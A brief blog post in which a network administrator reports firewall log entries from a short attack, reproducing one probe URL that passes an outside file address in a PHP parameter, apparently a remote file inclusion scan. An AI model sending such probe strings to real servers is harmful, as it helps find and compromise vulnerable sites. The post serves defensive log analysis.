Early, a co-worker came to me asking if I had seen the note from our DDoS mitigation provider. It was the first such email to provide a source address for the attack. The "attack" only lasted four minutes, and to me, was not much to worry about. However, there was at least an indicator to look for in the logs. I popped the source address into our firewall logs, and was presented 134 records back; all targeting various servers of ours.
And here was the unique finding. Every request string looked something like:
http://ourserver/some_bogus_directory/some_bogus_file.php?php121dir=http://www.google.com/humans.txtI fully admit, I had never heard of a humans.txt file; I knew about robots.txt, but not humans.txt. So I looked it up. We don't use it. Next, I fetched Google's human.txt file to see what was in there. Nothing untoward.
The best I can come up with is that this is some kind of remote file inclusion attack and the attacker is looking for vulnerable php servers.
I found a great site that had a little more info here, but their mitigation was in using .htaccess; we use our firewall. I did not find much more information, so anyone that wants to shed a little more light on the subject, feel free to leave a comment.
No comments:
Post a Comment